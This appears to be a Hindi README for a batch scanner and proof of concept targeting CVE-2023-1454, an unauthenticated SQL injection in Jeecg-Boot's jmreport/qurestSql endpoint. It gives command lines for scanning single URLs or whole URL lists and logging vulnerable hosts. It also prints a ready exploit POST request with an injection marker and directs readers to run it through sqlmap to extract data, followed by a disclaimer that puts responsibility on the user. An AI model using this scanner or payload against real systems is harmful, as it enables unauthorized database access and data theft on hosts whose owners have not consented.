
CVE-2023-1454,Jeecg-Boot फ्रंट-एंड SQL इंजेक्शन,CVE-2023-1454 बैच डिटेक्शन
jmreport/qurestSql अनधिकृत SQL इंजेक्शन बैच स्कैन POC Jeecg-Boot Spring Boot और Jeecg-Boot-Plus पर आधारित एक तीव्र विकास मंच है। नवीनतम jeecg-boot 3.5.0 में कई SQL इंजेक्शन कमजोरियाँ पाई गईं।
मूल टूल में गलत सकारात्मक (false positive) दर अधिक थी, इसलिए निर्णय की शर्तों में संशोधन किया गया और साथ ही कोड को अनुकूलित किया गया।
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 एकल URL परीक्षण
python3 CVE-2023-1454-scan.py -f url.txt बैच जाँच
स्कैन समाप्त होने के बाद, वर्तमान निर्देशिका में कमजोर URL वाली vuln.txt फ़ाइल बनाई जाएगी।
poc:

exp:
डेटा पैकेट को txt के रूप में सहेजें, sqlmap का उपयोग करके डेटा प्राप्त किया जा सकता है।
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

इस दस्तावेज़ में दी गई जानकारी के प्रसार या उपयोग से होने वाले किसी भी प्रत्यक्ष या अप्रत्यक्ष परिणाम और हानि के लिए उपयोगकर्ता स्वयं जिम्मेदार है; लेखक इसके लिए कोई जिम्मेदारी नहीं लेता है।